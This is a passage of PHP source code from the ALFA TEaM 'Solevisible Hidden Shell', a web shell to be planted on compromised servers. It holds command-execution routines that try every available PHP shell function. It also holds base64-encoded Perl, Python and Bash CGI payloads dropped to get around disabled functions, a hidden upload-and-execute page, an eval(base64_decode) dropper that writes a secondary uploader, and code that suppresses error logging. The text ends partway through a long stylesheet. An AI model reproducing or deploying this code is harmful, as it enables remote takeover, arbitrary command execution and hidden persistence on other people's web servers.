699 $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
700 $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
701 if($lang=="perl")$source = $perl;elseif($lang=="py")$source = $py;else $source = $bash;
702 alfaWriteTocgiapi($lang.".alfa",$source);
703 alfacgihtaccess('cgi', "alfacgiapi/");
704 }else{
705 $lang = $_COOKIE["alfacgiapi"];
706 }
707 $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd);
708 if($is_curl){
709 $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
710 $post = new AlfaCURL();
711 $data = $post->Send($address, "post", $cmd);
712 }elseif($is_socket){
713 $server = $_SERVER["SERVER_NAME"];
714 $uri = dirname($_SERVER["REQUEST_URI"])."/alfacgiapi/".$lang.".alfa";
715 $data = _alfa_fsockopen($server,$uri,$cmd);
716 }
717 $out = "";
718 if(strstr($data, "[solevisible~api]")){
719 if($set_cookie){
720 __alfa_set_cookie("alfacgiapi", $lang);
721 }
722 if(@preg_match("/<pre>(.*?)<\/pre>/s", $data, $res)){
723 $out = $res[1];
724 }
725 }elseif($lang=="perl"){
726 return _alfa_cgicmd($cmd_pure,"py",$set_cookie);
727 }elseif($lang=="py"){
728 return _alfa_cgicmd($cmd_pure,"bash",$set_cookie);
729 }else{
730 if($set_cookie){
731 __alfa_set_cookie("alfacgiapi_mode", "off");
732 }
733 }
734 return trim($out);
735 }else{
736 return "";
737 }
738}
739function alfaGetCwd(){
740 if(function_exists("getcwd")){
741 return @getcwd();
742 }else{
743 return dirname($_SERVER["SCRIPT_FILENAME"]);
744 }
745}
746function alfaEx($in,$re=false,$cgi=true,$all=false){
747 $data = _alfa_php_cmd($in,$re);
748 if(empty($data)&&$cgi||$all){
749 if($GLOBALS['sys']=='unix'){
750 if(strlen(_alfa_php_cmd("whoami"))==0||$all){
751 $cmd = _alfa_cgicmd($in);
752 if(!empty($cmd)){
753 return $cmd;
754 }
755 }
756 }
757 }
758 return $data;
759}
760function _alfa_php_cmd($in,$re=false){
761$out='';
762try{
763if($re)$in=$in." 2>&1";
764if(function_exists('exec')){
765@exec($in,$out);
766$out = @join("\n",$out);
767}elseif(function_exists('passthru')) {
768ob_start();
769@passthru($in);
770$out = ob_get_clean();
771}elseif(function_exists('system')){
772ob_start();
773@system($in);
774$out = ob_get_clean();
775} elseif (function_exists('shell_exec')) {
776$out = shell_exec($in);
777}elseif(function_exists("popen")&&function_exists("pclose")){
778if(is_resource($f = @popen($in,"r"))){
779$out = "";
780while(!@feof($f))
781$out .= fread($f,1024);
782pclose($f);
783}
784}elseif(function_exists('proc_open')){
785$pipes = array();
786$process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
787$out=@stream_get_contents($pipes[1]);
788}elseif(class_exists('COM')){
789$alfaWs = new COM('WScript.shell');
790$exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
791$stdout = $exec->StdOut();
792$out=$stdout->ReadAll();
793}
794}catch(Exception $e){}
795return $out;
796}
797function _alfa_fsockopen($server,$uri,$post){
798 $socket = @fsockopen($server, 80, $errno, $errstr, 15);
799 if($socket){
800 $http = "POST {$uri} HTTP/1.0\r\n";
801 $http .= "Host: {$server}\r\n";
802 $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
803 $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
804 $http .= "Content-length: " . strlen($post) . "\r\n";
805 $http .= "Connection: close\r\n\r\n";
806 $http .= $post . "\r\n\r\n";
807 fwrite($socket, $http);
808 $contents = "";
809 while (!@feof($socket)) {
810 $contents .= @fgets($socket, 4096);
811 }
812 list($header, $body) = explode("\r\n\r\n", $contents, 2);
813 @fclose($socket);
814 return $body;
815 }else{
816 return "";
817 }
818}
819if(isset($_GET["solevisible"])){
820@error_reporting(E_ALL ^ E_NOTICE);
821echo '<html>';
822echo "<title>Solevisible Hidden Shell</title>";
823echo "<body bgcolor=#000000>";
824echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">'.(function_exists('php_uname')?php_uname():'???').'</font></b></big>';
825$safe_mode = @ini_get('safe_mode');
826if($safe_mode){$r = "<b style='color: red'>On</b>";}else{$r = "<b style='color: green'>Off</b>";}
827echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>";
828echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER ['SERVER_SOFTWARE'] . "</font><br>";
829echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />";
830echo "PWD:<font color=#FFFFFF> " . str_replace("\\","/",@alfaGetCwd()) . "/<br />";
831echo "<b style='color: #7CFC00'>Safe Mode : $r<br>";
832echo"<font color=#7CFC00>Disable functions : </font>";
833$disfun = @ini_get('disable_functions');
834if(empty($disfun)){$disfun = '<font color="green">NONE</font>';}
835echo"<font color=red>";
836echo "$disfun";
837echo"</font><br>";
838echo "<b style='color: #7CFC00'>Your Ip Address is : </font><font color=white>" . $_SERVER['REMOTE_ADDR'] . "</font><br>";
839echo "<b style='color: #7CFC00'>Server Ip Address is : </font><font color=white>".(function_exists('gethostbyname')?@gethostbyname($_SERVER["HTTP_HOST"]):'???')."</font><br><p>";
840echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
841echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@alfaGetCwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';
842if(isset($_FILES['file'])){
843if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }
844else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }
845}
846echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>
847<hr><pre>';
848if(isset($_POST['command_solevisible'])){
849if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';
850$solevisible = "cd '".addslashes(str_replace("\\","/",@alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
851echo alfaEx($solevisible);
852}
853echo'</pre>
854</body></html>';
855exit;}
856@error_reporting(E_ALL ^ E_NOTICE);
857@ini_set('error_log',NULL);
858@ini_set('log_errors',0);
859@ini_set('max_execution_time',0);
860@ini_set('magic_quotes_runtime', 0);
861@set_time_limit(0);
862if(function_exists('set_magic_quotes_runtime')){
863@set_magic_quotes_runtime(0);
864}
865foreach($_POST as $key => $value){
866if(is_array($_POST[$key])){
867$i=0;
868foreach($_POST[$key] as $f) {
869$f = trim(str_replace(' ', '+',$f));
870$_POST[$key][$i] = decrypt_post($f);
871$i++;
872}
873}else{
874$value = trim(str_replace(' ', '+',$value));
875$_POST[$key] = decrypt_post($value);
876}
877}
878$default_action = 'FilesMan2';//'FilesMan';
879$default_use_ajax = true;
880$default_charset = 'Windows-1251';
881if(strtolower(substr(PHP_OS,0,3))=="win")
882$GLOBALS['sys']='win';
883else
884$GLOBALS['sys']='unix';
885$GLOBALS['home_cwd'] = @alfaGetCwd();
886$GLOBALS["need_to_update_header"] = "false";
887$GLOBALS['glob_chdir_false'] = false;
888if(isset($_POST['c'])){
889if(!@chdir($_POST['c'])){
890 $GLOBALS['glob_chdir_false'] = true;
891}
892}
893$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ?$_POST['c']:@alfaGetCwd());
894if($GLOBALS['glob_chdir_false']){
895 $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
896}
897if($GLOBALS['sys'] == 'win'){
898$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);
899$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);
900}
901if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';
902if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}
903define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));
904function alfahead(){
905$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
906$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';
907define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");
908if(!isset($_POST['ajax'])){
909function Alfa_GetDisable_Function(){
910$disfun = @ini_get('disable_functions');
911$afa = '<span class="header_show_all">All Functions Accessible</span>';
912if(empty($disfun))return($afa);
913$s = explode(',',$disfun);
914$s = array_unique($s);
915$i=0;
916$b=0;
917$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');
918$black_list = array();
919$allow_list = array();
920foreach($s as $d){
921 $d=trim($d);
922 if(empty($d)||!is_callable($d))continue;
923 if(!function_exists($d)){
924 if(in_array($d,$func)){
925 $dis .= $d." | ";$b++;
926 $black_list[] = $d;
927 }else{
928 $allow_list[] = $d;
929 }
930 $i++;
931 }
932}
933if($i==0)return($afa);
934if($i <= count($func)){
935$all = array_values(array_merge($black_list, $allow_list));
936return('<span class="disable_functions">'.implode(" | ", $all).'</span>');
937}
938return('<span class="disable_functions">'.$dis.'</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');
939}
940function AlfaNum(){
941$args = func_get_args();
942$alfax = array();
943$find = array();
944for($i=1;$i<=10;$i++){
945$alfax[] = $i;
946}
947foreach($args as $arg){
948$find[] = $arg;
949}
950echo '<script>';
951foreach($alfax as $alfa){
952if(in_array($alfa,$find))
953continue;
954echo 'alfa'.$alfa."_=";
955}
956echo '""</script>';
957}
958if(empty($_POST['charset']))
959$_POST['charset'] = $GLOBALS['default_charset'];
960$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';
961$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';
962$totalSpace = $totalSpace?$totalSpace:1;
963$on="<span class='header_on'> ON </span>";
964$of="<span class='header_off'> OFF </span>";
965$none="<span class='header_none'> NONE </span>";
966if(function_exists('ssh2_connect'))
967$ssh2=$on;
968else
969$ssh2=$of;
970if(function_exists('curl_version'))
971$curl=$on;
972else
973$curl=$of;
974if(function_exists('mysql_get_client_info')||class_exists('mysqli'))
975$mysql=$on;
976else
977$mysql=$of;
978if(function_exists('mssql_connect'))
979$mssql=$on;
980else
981$mssql=$of;
982if(function_exists('pg_connect'))
983$pg=$on;
984else
985$pg=$of;
986if(function_exists('oci_connect'))
987$or=$on;
988else
989$or=$of;
990if(@ini_get('disable_functions'))
991$disfun=@ini_get('disable_functions');
992else
993$disfun="All Functions Enable";
994if(@ini_get('safe_mode'))
995$safe_modes="<span class='header_off'>ON</span>";
996else
997$safe_modes="<span class='header_on'>OFF</span>";
998$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";
999if(@ini_get('open_basedir')){
1000$basedir_data = @ini_get('open_basedir');
1001if(strlen($basedir_data)>120){
1002$open_b=substr($basedir_data,0, 120)."...";
1003}else{
1004$open_b = $basedir_data;
1005}
1006}else{$open_b=$none;}
1007if(@ini_get('safe_mode_exec_dir'))
1008$safe_exe=@ini_get('safe_mode_exec_dir');
1009else
1010$safe_exe=$none;
1011if(@ini_get('safe_mode_include_dir'))
1012$safe_include=@ini_get('safe_mode_include_dir');
1013else
1014$safe_include=$none;
1015if(!function_exists('posix_getegid'))
1016{
1017$user = function_exists("get_current_user")?@get_current_user():"????";
1018$uid = function_exists("getmyuid")?@getmyuid():"????";
1019$gid = function_exists("getmygid")?@getmygid():"????";
1020$group = "?";
1021}else{
1022$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");
1023$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");
1024$user = $uid['name'];
1025$uid = $uid['uid'];
1026$group = $gid['name'];
1027$gid = $gid['gid'];
1028}
1029$cwd_links = '';
1030$path = explode("/", $GLOBALS['cwd']);
1031$n=count($path);
1032for($i=0; $i<$n-1; $i++) {
1033$cwd_links .= "<a class='header_pwd' onclick='g(\"FilesMan\",\"";
1034$cach_cwd_path = "";
1035for($j=0; $j<=$i; $j++){
1036$cwd_links .= $path[$j].'/';
1037$cach_cwd_path .= $path[$j].'/';
1038}
1039$cwd_links .= "\")' path='".$cach_cwd_path."' href='#action=fileman&path=".$cach_cwd_path."'>".$path[$i]."/</a>";
1040}
1041$drives = "";
1042foreach(range('a','z') as $drive)
1043if(@is_dir($drive.':\\'))
1044$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
1045$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';
1046echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1047<html xmlns="http://www.w3.org/1999/xhtml">
1048<head>
1049<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
1050<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
1051<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>
1052<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ::..</title>
1053<style type="text/css">';?>
1054.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a solid}.update-close:hover{border:2px #25ff00 solid;color:red}.filestools{height:auto;width:auto;color:#67abdf;font-size:12px;font-family:Verdana,Geneva,sans-serif}@-moz-document url-prefix(){#search-input{width:173px}.editor-path{top:3px}}.filters-holder{padding:5px;padding-left:10px}.filters-holder input{width:200px}.filters-holder span{color:#8bc7f7}#rightclick_menu{width:175px;visibility:hidden;opacity:0;position:fixed;background:#0f304a;color:#555;font-family:sans-serif;font-size:11px;-webkit-transition:opacity .5s ease-in-out;-moz-transition:opacity .5s ease-in-out;-ms-transition:opacity .5s ease-in-out;-o-transition:opacity .5s ease-in-out;transition:opacity .5s ease-in-out;-webkit-box-shadow:-1px 0 17px 0 #8b8b8c;-moz-box-shadow:-1px 0 17px 0 #8b8b8c;box-shadow:-1px 0 17px 0 #8b8b8c;padding:0;border:1px solid #737373;border-radius:10px}#rightclick_menu a{display:block;color:#fff;font-weight:bolder;text-decoration:none;padding:6px 8px 6px 30px;position:relative;padding-left:40px}#rightclick_menu a i.fa,#rightclick_menu a img{height:20px;font-size:17px;width:20px;position:absolute;left:5px;top:2px;padding-left:5px}#rightclick_menu a span{color:#bcb1b3;float:right}#rightclick_menu a:hover{color:#fff;background:#3879d9}#rightclick_menu hr{border:1px solid #ebebeb;border-bottom:0}.cl-popup-fixed{position:fixed;top:0;left:0;width:100%;height:100%;background:#201e1ead}#shortcutMenu-holder{position:absolute;top:40%;left:50%;transform:translate(-50%,-50%);background:#1f1e1edb;height:190px;width:500px;color:#fff}#shortcutMenu-holder>.popup-head{background:#207174;padding:6px;border-top:10px;text-align:center;font-family:sans-serif;color:#fff}#shortcutMenu-holder>form{padding:10px}#shortcutMenu-holder>form>label{display:block}#shortcutMenu-holder>form>input{width:99%;height:24px;margin-top:4px;color:#fff;outline:0;font-size:16px}#shortcutMenu-holder>.popup-foot{float:right;height:30px;margin-right:8px}#shortcutMenu-holder>.popup-foot>button{height:100%;cursor:pointer;color:#fff;outline:0}.php-terminal-output{overflow:auto;height:86%;border:1px solid #1e5673;border-radius:10px}.cmd-history-holder{visibility:hidden;opacity:0;position:absolute;color:#dff3d5;background:#093d58;top:-300px;height:300px;width:calc(69% + -11px);border-radius:10px 10px 0 0;left:calc(2% - 9px);transition:visibility .5s,opacity .5s linear}.cmd-history-holder .commands-history-header{background:#37504e;text-align:center;border-radius:10px 10px 0 0}.cmd-history-icon{width:27px;top:6px;left:calc(69% + 5px);position:absolute;cursor:pointer}.history-cmd-line{padding:4px;border-bottom:1px dashed;cursor:pointer}.history-cmd-line:hover{background:#961111}#myUL,#myUL ul{list-style-type:none}#myUL{margin:0;padding:0}.box{cursor:pointer;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.box::before{content:"\2610";color:#000;display:inline-block;margin-right:6px}.check-box::before{content:"\2611";color:#1e90ff}.nested{display:none}.active{display:block}.flag-holder>img{width:20px;vertical-align:middle;padding-left:6px}#options_window .content_options_holder .options_holder{position:relative;display:none;overflow:auto;min-height:300px;max-height:calc(100vh - 100px)}#options_window .content_options_holder .options_holder .header{min-height:50vh}#options_window .content_options_holder .options_holder.option_is_active{display:block}#options_window .content_options_holder .options_tab{padding:5px;margin-left:14px;margin-right:30px;background:#000;border-bottom:7px solid #0f304a;border-left:7px solid #0f304a;border-right:7px solid #0f304a;overflow-x:auto;white-space:nowrap}#filesman_tabs .filesman_tab img,#options_window .content_options_holder .options_tab .tab_name img,.editor-tab-name img,.sql-tabs .sql-tabname img,.terminal-tabs .terminal-tab 